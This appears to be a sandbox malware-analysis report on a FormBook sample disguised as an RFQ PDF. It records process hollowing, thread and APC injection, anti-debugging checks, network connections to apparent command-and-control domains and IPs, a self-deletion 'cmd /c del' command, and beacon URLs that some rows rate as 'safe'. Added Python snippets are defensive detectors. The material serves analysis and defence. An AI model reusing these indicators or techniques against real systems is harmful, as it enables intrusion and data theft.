          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04861074 mov eax, dword ptr fs:[00000030h]7_2_04861074
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04852073 mov eax, dword ptr fs:[00000030h]7_2_04852073
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799080 mov eax, dword ptr fs:[00000030h]7_2_04799080
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]7_2_0479B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]7_2_0479B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C962 mov eax, dword ptr fs:[00000030h]7_2_0479C962
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048169A6 mov eax, dword ptr fs:[00000030h]7_2_048169A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]7_2_047BB944
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]7_2_047BB944
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]7_2_048151BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]7_2_048151BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]7_2_048151BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]7_2_048151BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]7_2_047C513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]7_2_047C513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov ecx, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048241E8 mov eax, dword ptr fs:[00000030h]7_2_048241E8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]7_2_04799100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]7_2_04799100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]7_2_04799100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]7_2_0479B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]7_2_0479B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]7_2_0479B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]7_2_047C61A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]7_2_047C61A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2990 mov eax, dword ptr fs:[00000030h]7_2_047C2990
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC182 mov eax, dword ptr fs:[00000030h]7_2_047BC182
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA185 mov eax, dword ptr fs:[00000030h]7_2_047CA185
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D927A mov eax, dword ptr fs:[00000030h]7_2_047D927A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]7_2_04799240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]7_2_04799240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]7_2_04799240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]7_2_04799240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]7_2_047D4A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]7_2_047D4A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B3A1C mov eax, dword ptr fs:[00000030h]7_2_047B3A1C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]7_2_04795210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov ecx, dword ptr fs:[00000030h]7_2_04795210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]7_2_04795210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]7_2_04795210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]7_2_0479AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]7_2_0479AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A8A0A mov eax, dword ptr fs:[00000030h]7_2_047A8A0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe  Process token adjusted: Debug
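          The long run of `mov eax, dword ptr fs:[00000030h]` entries above is the static signature behind "Contains functionality to read the PEB": on 32-bit Windows (and under WOW64) `fs:[0x30]` is the PEB pointer, and the byte or dword read right after it is usually `BeingDebugged` (PEB+0x02, what `IsDebuggerPresent` returns) or `NtGlobalFlag` (PEB+0x68, which a debugger sets to 0x70). The Python below is an added example, not code from the report or from the sample: it scans a byte blob for both x86 encodings of the read (the `A1` moffs form for `eax` and the `8B /r` form for any register, which is why the report also lists `mov ecx, ...`) and names the field that is dereferenced next. `SAMPLE_CODE` is a constructed function body and the base address is arbitrary; the field heuristic in `classify_read` is an assumption that the very next instruction dereferences the pointer with an 8-bit displacement.

```python
"""Static check for 32-bit PEB reads (mov r32, fs:[30h]) in a code blob.

Added example, not code from the sandbox report or the sample. SAMPLE_CODE is a
constructed byte string; the base address passed to scan_peb_reads is arbitrary.
"""
import re

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 64            FS segment override
# A1 30000000   mov eax, fs:[30h]   (moffs32 form, eax only)
# 8B /r         mov r32, fs:[30h]   ModRM mod=00 rm=101 (disp32), reg = target
PEB_READ = re.compile(
    rb"\x64(?:\xA1\x30\x00\x00\x00"
    rb"|\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00)"
)

# Heuristic (assumption): the following instruction dereferences the PEB pointer
# with ModRM mod=01 (0x40-0x7F) plus an 8-bit displacement. 0x02 is
# BeingDebugged, 0x68 is NtGlobalFlag in the 32-bit PEB.
PEB_FIELDS = {0x02: "BeingDebugged", 0x68: "NtGlobalFlag"}


def classify_read(code: bytes, end: int, window: int = 6) -> str:
    """Name the PEB field used right after the mov that ends at offset `end`."""
    tail = code[end:end + window]
    for i in range(len(tail) - 1):
        if 0x40 <= tail[i] <= 0x7F and tail[i + 1] in PEB_FIELDS:
            return PEB_FIELDS[tail[i + 1]]
    return "unknown"


def scan_peb_reads(code: bytes, base: int = 0):
    """Return (address, register, field) for every fs:[30h] read in `code`."""
    hits = []
    for m in PEB_READ.finditer(code):
        modrm = m.group(1)
        # A1 form has no ModRM and always targets eax; 8B form encodes the
        # destination register in ModRM bits 3-5.
        reg = "eax" if modrm is None else REG32[(modrm[0] >> 3) & 7]
        hits.append((base + m.start(), reg, classify_read(code, m.end())))
    return hits


# Constructed function body: reads BeingDebugged, then NtGlobalFlag, then the
# TEB via fs:[18h], which must not be reported as a PEB read.
SAMPLE_CODE = (
    b"\x55\x8B\xEC"                  # push ebp; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"      # mov eax, fs:[30h]            -> PEB
    b"\x0F\xB6\x40\x02"              # movzx eax, byte ptr [eax+2]  -> BeingDebugged
    b"\x64\x8B\x0D\x30\x00\x00\x00"  # mov ecx, fs:[30h]            -> PEB
    b"\x8B\x49\x68"                  # mov ecx, [ecx+68h]           -> NtGlobalFlag
    b"\x64\xA1\x18\x00\x00\x00"      # mov eax, fs:[18h]            -> TEB, ignored
    b"\x5D\xC3"                      # pop ebp; ret
)

if __name__ == "__main__":
    for addr, reg, field in scan_peb_reads(SAMPLE_CODE, base=0x00400000):
        print(f"{addr:08X} mov {reg}, dword ptr fs:[00000030h]  ({field})")
```

The two regex alternatives are the same patterns a YARA rule would carry as `{ 64 A1 30 00 00 00 }` and `{ 64 8B ?? 30 00 00 00 }`; the sandbox counts one hit per occurrence, which is why a single function such as `7_2_04851C06` appears many times in the listing. Treat the field classification as a hint only: compilers and packers freely move the dereference a few instructions away.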

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe  Domain query: www.rootedwithlovejax.com
          Source: C:\Windows\explorer.exe  Domain query: www.essentials-trading.com
          Source: C:\Windows\explorer.exe  Domain query: www.coloradocouponclub.com
          Source: C:\Windows\explorer.exe  Network Connect: 107.178.142.156 80
          Source: C:\Windows\explorer.exe  Domain query: www.tennesseewheelrepair.com
          Source: C:\Windows\explorer.exe  Network Connect: 162.241.244.61 80
          Source: C:\Windows\explorer.exe  Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe  Domain query: www.quickeasybites.com
          Source: C:\Windows\explorer.exe  Domain query: www.ssfgasia.com
          Source: C:\Windows\explorer.exe  Domain query: www.hzmsbg.com
          Source: C:\Windows\explorer.exe  Network Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exe  Network Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exe  Network Connect: 66.96.161.160 80
          Source: C:\Windows\explorer.exe  Network Connect: 216.239.36.21 80
          Source: C:\Windows\explorer.exe  Domain query: www.kf350.com
          Source: C:\Windows\explorer.exe  Domain query: www.1364kensington.com
          Source: C:\Windows\explorer.exe  Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe  Domain query: www.desertfoxindustries.com
          Source: C:\Windows\explorer.exe  Domain query: www.pierresplayhouse.com
          Source: C:\Windows\explorer.exe  Domain query: www.thecapitalhut.com
          Source: C:\Windows\explorer.exe  Domain query: www.luegomusic.com
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Section loaded: unknown  target: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Section loaded: unknown  target: C:\Windows\explorer.exe  protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Section loaded: unknown  target: C:\Windows\SysWOW64\control.exe  protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Section loaded: unknown  target: C:\Windows\SysWOW64\control.exe  protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe  Section loaded: unknown  target: C:\Windows\explorer.exe  protection: read write
          Source: C:\Windows\SysWOW64\control.exe  Section loaded: unknown  target: C:\Windows\explorer.exe  protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\control.exe  Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Section unmapped: C:\Windows\SysWOW64\control.exe  base address: E70000
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe  Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\control.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: explorer.exe, 00000005.00000002.909699589.0000000000AD8000.00000004.00000020.sdmp  Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp  Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.669092694.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp  Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmp  Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match; File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Numbers in parentheses are the report's per-cell signature counts; cells without a number are unmatched techniques shown for context.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API (1) | Path Interception | Process Injection (612) | Virtualization/Sandbox Evasion (3) | OS Credential Dumping | Security Software Discovery (241) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection (612) | LSASS Memory | Virtualization/Sandbox Evasion (3) | Remote Desktop Protocol | Clipboard Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (1) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information (2) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (13) | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing (1) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery (12) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph

Behavior Graph ID: 383968; Sample: RFQ_AP65425652_032421 isu-isu,pdf.exe; Start date: 08/04/2021; Architecture: WINDOWS; Score: 100

Start node: DNS lookup of www.lideresdeimmunocal.com. Signatures on the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures.

RFQ_AP65425652_032421 isu-isu,pdf.exe (started)
    dropped file: C:\Users\user\AppData\Local\...\fsfomt.dll, PE32
    signatures: Maps a DLL or memory area into another process
    -> RFQ_AP65425652_032421 isu-isu,pdf.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        -> explorer.exe (injected)
            network: luegomusic.com 162.241.244.61:80 (local port 49764), UNIFIEDLAYER-AS-1US, United States; www.pierresplayhouse.com 199.59.242.153:80 (local port 49771), BODIS-NJUS, United States; 19 other IPs or domains
            signatures: System process connects to network (likely due to code injection or exploit)
            -> control.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                -> cmd.exe (started)
                    -> conhost.exe (started)
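The chain in the behavior graph (the sample starts a copy of itself, the copy hollows and injects explorer.exe, explorer.exe starts control.exe, and control.exe runs cmd.exe /c del against the original file) is hard to catch with parent/child rules alone: explorer.exe was already running, so the sample is never an ancestor of the cmd.exe that deletes it. The following is an added detection example, not part of the Joe Sandbox report, that models the chain as constructed process-creation and injection events (the kind a Sysmon ProcessCreate/CreateRemoteThread sensor emits) and attributes each process to its origin across injection edges before deciding whether a delete is a proxied self-deletion. All PIDs and parent PIDs are made up for the example; 3424 was chosen to match the report's "Thread register set: target process: 3424" line, and the cmd.exe command line is quoted as the report shows it.

```python
import re

# Constructed events modelled on this report's behavior graph: (pid, ppid, image, command line).
# PIDs are invented. explorer.exe is a pre-existing shell process (its parent 2800 is not in
# the event set), not a child of the sample, which is exactly what defeats naive lineage rules.
SAMPLE = r"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe"
PROC_EVENTS = [
    (3012, 2900, SAMPLE, f"'{SAMPLE}'"),
    (3100, 3012, SAMPLE, f"'{SAMPLE}'"),                      # self-spawned, hollowed copy
    (3424, 2800, r"C:\Windows\explorer.exe", "explorer.exe"),  # already running
    (3520, 3424, r"C:\Windows\SysWOW64\control.exe", "control.exe"),
    (3600, 3520, r"C:\Windows\SysWOW64\cmd.exe", f"cmd.exe /c del '{SAMPLE}'"),
]
# Constructed injection events (source pid -> target pid): the hollowed copy injects explorer.exe.
INJECT_EVENTS = [(3100, 3424)]

# "del [/switches] 'path'" with optional single or double quotes around the path.
DEL_RE = re.compile(r"""\bdel\s+(?:/\w+\s+)*['"]?([^'"]+?)['"]?\s*$""", re.IGNORECASE)


def build_tree(events, injects):
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    injected_by = {dst: src for src, dst in injects}
    return by_pid, injected_by


def origin_chain(pid, by_pid, injected_by):
    """Walk from pid to the process that ultimately controls it. A process that was injected
    is attributed to its injector rather than to its parent. The last element is the origin."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = injected_by.get(pid, by_pid[pid][0])
    return chain


def ancestry_root(pid, by_pid):
    """Plain parent/child root, ignoring injection (what a lineage-only rule sees)."""
    seen = set()
    while pid not in seen and by_pid.get(pid, (None,))[0] in by_pid:
        seen.add(pid)
        pid = by_pid[pid][0]
    return pid


def tainted_processes(events, injects):
    """PIDs whose injection-aware origin differs from their lineage root: system processes
    that are executing on behalf of something that injected into their tree."""
    by_pid, injected_by = build_tree(events, injects)
    return sorted(pid for pid in by_pid
                  if origin_chain(pid, by_pid, injected_by)[-1] != ancestry_root(pid, by_pid))


def find_proxy_self_deletion(events, injects):
    """Flag a 'del <path>' whose <path> is the on-disk image of the origin process of the
    deleting cmd.exe, even when the origin is several injection hops away."""
    by_pid, injected_by = build_tree(events, injects)
    hits = []
    for pid, (_, _, cmd) in by_pid.items():
        m = DEL_RE.search(cmd)
        if not m:
            continue
        chain = origin_chain(pid, by_pid, injected_by)
        origin = chain[-1]
        if by_pid[origin][1].lower() == m.group(1).strip().lower():
            hits.append({"pid": pid, "deleted": m.group(1), "origin_pid": origin, "chain": chain})
    return hits


if __name__ == "__main__":
    print("tainted:", tainted_processes(PROC_EVENTS, INJECT_EVENTS))
    for h in find_proxy_self_deletion(PROC_EVENTS, INJECT_EVENTS):
        print(f"cmd.exe pid {h['pid']} deletes image of pid {h['origin_pid']} via chain {h['chain']}")
    print("without injection telemetry:", find_proxy_self_deletion(PROC_EVENTS, []))
```

Run with the injection event removed and the same delete is not flagged, because control.exe then resolves to explorer.exe as its root. That is the practical point of this chain: the deletion and the network traffic only attribute back to the sample if thread-injection events (remote thread creation, APC queueing, or the sandbox's "Thread register set" equivalent) are collected alongside process creation.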


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
RFQ_AP65425652_032421 isu-isu,pdf.exe | 35% | Virustotal |
RFQ_AP65425652_032421 isu-isu,pdf.exe | 42% | ReversingLabs | Win32.Trojan.Wacatac
RFQ_AP65425652_032421 isu-isu,pdf.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll | 23% | ReversingLabs | Win32.Trojan.Wacatac

Unpacked PE Files

Source | Detection | Scanner | Label
2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.control.exe.4ca7960.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.control.exe.a0a460.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.72ad0000.5.unpack | 100% | Avira | HEUR/AGEN.1131513
2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Rows marked "(×3)" appeared three times in the original table with identical verdicts and are collapsed here.

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (×3) | safe
http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe
http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation (×3) | safe
http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe
http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation (×3) | safe
http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe
https://rootedwithlovejax.com | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation (×3) | safe
www.luegomusic.com/pe0r/ | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation (×3) | safe
http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation (×3) | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation (×3) | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation (×3) | safe
http://fontfabrik.com | 0% | URL Reputation (×3) | safe
http://www.founder.com.cn/cn | 0% | URL Reputation (×3) | safe
http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation (×3) | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (×3) | safe
